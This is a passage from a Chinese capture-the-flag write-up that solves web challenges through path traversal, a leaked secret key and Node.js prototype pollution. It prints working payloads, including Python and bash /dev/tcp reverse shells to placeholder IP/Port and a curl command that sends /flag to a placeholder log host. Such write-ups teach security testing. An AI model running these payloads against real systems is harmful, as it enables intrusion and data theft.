style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;a&#34;</span>)<br/><span style="box-sizing: border-box;">bin_data</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;">filei</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">read</span>()<br/><span style="box-sizing: border-box;">data</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;">base64</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">b64encode</span>(<span style="box-sizing: border-box;">bin_data</span>)<br/><span style="box-sizing: border-box;">data</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;color: rgb(3, 47, 98);">f&#34;Bearer <span style="box-sizing: border-box;color: rgb(36, 41, 46);"><span style="box-sizing: border-box;">{</span><span style="box-sizing: border-box;">data</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">decode</span>(<span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#39;utf-8&#39;</span>)<span style="box-sizing: border-box;">}</span></span>&#34;</span><br/><span style="box-sizing: border-box;">fileo</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">write</span>(<span style="box-sizing: border-box;">data</span>)<br/><span style="box-sizing: border-box;">filei</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">close</span>()<br/><span style="box-sizing: border-box;">fileo</span>.<span style="box-sizing: border-box;color: rgb(111, 66, 193);">close</span>()</pre><p style="box-sizing: border-box;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">将生成的payoad通过<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/common/user/current</code>打过去即可</p><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">picdown</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察Python的flask以及Linux相关知识点</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">给<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">url</code>参数传喜闻乐见的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">../../../../../../etc/passwd</code>，可以目录穿越读到文件，尝试下载<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">index.php</code>报错了，继续尝试<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">main.py</code>成功获取源码</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="1.346693386773547" data-s="300,640" style="" data-type="png" data-w="499" src="https://wechat2rss.xlab.app/img-proxy/?k=16c84f8d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGdmEX0k7zmNHmpNcMgyQQelMzZ6lf9h6hDO35HXQdptBQMcxXM3yicTQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">程序开头把<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/tmp/secret.txt</code>的内容读入变量后就把文件删掉了，<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">manager</code>函数校验key后即可执行命令</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.5305466237942122" data-s="300,640" style="" data-type="png" data-w="622" src="https://wechat2rss.xlab.app/img-proxy/?k=b5b38bd9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGx6PZq0bjo3XMiaiagjiat9xj6Nt3gC5j4d1ibactf2kYuUcpYJWFzPEChA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><img class="rich_pages js_insertlocalimg" data-ratio="0.5115864527629234" data-s="300,640" style="text-align: center;color: rgb(51, 51, 51);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;" data-type="png" data-w="561" src="https://wechat2rss.xlab.app/img-proxy/?k=d217447e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGph1dwn7kpIpjiacejfvicb1qHGC2RJzS4hwscF1HAD0uxRjm8Qt8icXGg%2F640%3Fwx_fmt%3Dpng"/><span class="js_jump_icon h5_image_link" data-positionback="static" style="top: auto;left: auto;margin: 0px;right: auto;bottom: auto;"></span></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">结合题目环境猜测可能要用到Linux神奇的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/proc</code>内存接口进一步获取信息，从<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/proc/self/cmdline</code>得知程序所在目录为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/root/</code>，继续fuzz发现在<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/proc/self/fd/3</code>中存在一段十六进制<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">PXR2aoaf3zuHodBEKE46B0baM5X6cgvPXMgJIfUg1z8</code>，猜测其就是<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/tmp/secret.txt</code>的内容</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">给<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/no_one_know_the_manager</code>传key和命令执行后意识到没有回显，利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/dev/tcp</code>反弹也没有反应，最后利用python反弹成功</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;">/no_one_know_the_manager<span style="box-sizing: border-box;color: rgb(215, 58, 73);">?</span>key=PXR2aoaf3zuHodBEKE46B0baM5X6cgvPXMgJIfUg1z8=<span style="box-sizing: border-box;color: rgb(215, 58, 73);">&amp;</span>shell=python%20-c%20%27import%20socket,subprocess,os<span style="box-sizing: border-box;color: rgb(215, 58, 73);">;</span>s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)<span style="box-sizing: border-box;color: rgb(215, 58, 73);">;</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);">s.connect((&#34;IP&#34;,Port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno</span>(),2);p=subprocess.call([<span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#34;</span>/bin/sh<span style="box-sizing: border-box;">&#34;</span></span>,<span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#34;</span>-i<span style="box-sizing: border-box;">&#34;</span></span>])<br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);"><span style="box-sizing: border-box;">#</span> /root/flag.txt</span></pre><h2 style="margin-top: 24px;margin-bottom: 16px;padding-bottom: 0.3em;font-weight: 600;font-size: 1.5em;white-space: normal;box-sizing: border-box;line-height: 1.25;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;background-color: rgb(255, 255, 255);">Notes</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察node.js原型链污染</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">直接给了部分源码，看到<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">undefsafe</code>这个包名就很奇奇怪怪，搜索<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">undefsafe vuln</code>的第一条结果就说明了其存在原型链污染</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(215, 58, 73);">var</span> <span style="box-sizing: border-box;">a</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">require</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;undefsafe&#34;</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">;</span><br/><span style="box-sizing: border-box;color: rgb(215, 58, 73);">var</span> <span style="box-sizing: border-box;">payload</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;__proto__.toString&#34;</span><span style="box-sizing: border-box;">;</span><br/><span style="box-sizing: border-box;">a</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;">{</span><span style="box-sizing: border-box;">}</span><span style="box-sizing: border-box;">,</span><span style="box-sizing: border-box;">payload</span><span style="box-sizing: border-box;">,</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;JHU&#34;</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">;</span><br/><span style="box-sizing: border-box;">console</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);">log</span><span style="box-sizing: border-box;">(</span><span style="box-sizing: border-box;">{</span><span style="box-sizing: border-box;">}</span><span style="box-sizing: border-box;">.</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">toString</span><span style="box-sizing: border-box;">)</span><span style="box-sizing: border-box;">;</span></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">可能导致的攻击有：</p><ol style="padding-left: 2em;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="box-sizing: border-box;margin-top: 16px;margin-bottom: 16px;">污染<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">Object.prototype.toString</code>相关操作为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">int</code>等类型，导致DoS</p></li><li style="box-sizing: border-box;margin-top: 0.25em;"><p style="box-sizing: border-box;margin-top: 16px;margin-bottom: 16px;">污染形如<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">user.isAdmin</code>的属性，导致越权</p></li><li style="box-sizing: border-box;margin-top: 0.25em;"><p style="box-sizing: border-box;margin-top: 16px;margin-bottom: 16px;">污染到<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">Object.prototype.someattr</code>后，其被形如<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">eval(someobject.someattr)</code>的代码执行后，导致RCE</p></li></ol><p style="box-sizing: border-box;margin-top: 16px;margin-bottom: 16px;"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">结合开头处显眼的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">const { exec } = require(&#39;child_process&#39;);</code>来看，肯定是命令执行无误了，搜索<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">exec</code>快速定位到能执行命令的功能点</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.5196182396606575" data-s="300,640" style="" data-type="png" data-w="943" src="https://wechat2rss.xlab.app/img-proxy/?k=ac6d9ea0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGdX51hfibslibuDrTHF4FHghj9VV3AyAtyssXE5HDKicic8iauOvRFpzT75Q%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">可以看到用了从数组中枚举的方式来获取值，并传递给<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">exec</code>函数利用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/bin/bash&#39;</code>解释执行，存在被利用原型链污染后新增<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">命令</code>的风险，接下来只需要找到可控的输入流和调用了<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">undefsafe</code>的地方</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.15138282387190685" data-s="300,640" style="" data-type="png" data-w="687" src="https://wechat2rss.xlab.app/img-proxy/?k=afb52016&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGTibImZVs06z5ukCRP5UGiaTW9AsQwPS12GK8mic2rmLRfZeRRMJ2xAWxw%2F640%3Fwx_fmt%3Dpng"/></p><p><span style="font-size: 0px;background-color: rgb(255, 255, 255);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;"></span><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.43377885783718106" data-s="300,640" style="" data-type="png" data-w="823" src="https://wechat2rss.xlab.app/img-proxy/?k=995f3e83&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGet2XMHru27WqibDoFndib7P5pl5QuFiadrTxavLRqpVNfDCbKBFVbqOOQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">这样就可以通过向<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/edit_note</code> POST Payload，再访问<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/status</code>触发命令执行</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(106, 115, 125);">// 反弹Shell</span><br/><span style="box-sizing: border-box;">id</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;">__proto__</span>&amp;<span style="box-sizing: border-box;">author</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;">bash</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">-</span><span style="box-sizing: border-box;">i</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">&gt;</span>%<span style="box-sizing: border-box;color: rgb(0, 92, 197);">26</span> /<span style="box-sizing: border-box;">dev</span>/<span style="box-sizing: border-box;">tcp</span>/<span style="box-sizing: border-box;color: rgb(0, 92, 197);">IP</span>/<span style="box-sizing: border-box;color: rgb(227, 98, 9);">Port</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">0</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">&gt;</span>%<span style="box-sizing: border-box;color: rgb(0, 92, 197);">261</span>&amp;<span style="box-sizing: border-box;">raw</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">1</span><br/><span style="box-sizing: border-box;color: rgb(106, 115, 125);">// 直接读文件</span><br/><span style="box-sizing: border-box;">id</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;">__proto__</span>&amp;<span style="box-sizing: border-box;">author</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;">curl</span> <span style="box-sizing: border-box;color: rgb(227, 98, 9);">WebLog</span>/<span style="box-sizing: border-box;color: rgb(3, 47, 98);">`cat /flag | base64`</span>&amp;<span style="box-sizing: border-box;">raw</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">1</span></pre><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">starbucket</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察AmazonS3 starbucket</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">直接给了个链接，访问后按flag会提示没权限。扫目录后，访问<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">config.php</code>可以看到报错</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;margin-bottom: 16px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;color: rgb(36, 41, 46);text-align: start;"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;background: initial;border-radius: 3px;word-break: normal;border-width: 0px;border-style: initial;border-color: initial;display: inline;overflow: visible;line-height: inherit;overflow-wrap: normal;">**Fatal error**: Uncaught Error: Class &#39;Aws\S3\S3Client&#39; not found in /var/www/html/config.php:8 Stack trace: #0 {main} thrown in **/var/www/html/config.php** on line **8**</code></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">从前端接口看到用了<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">starbucket ACL</code>，搜索一下可以知道其存在的三种访问权限分别为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 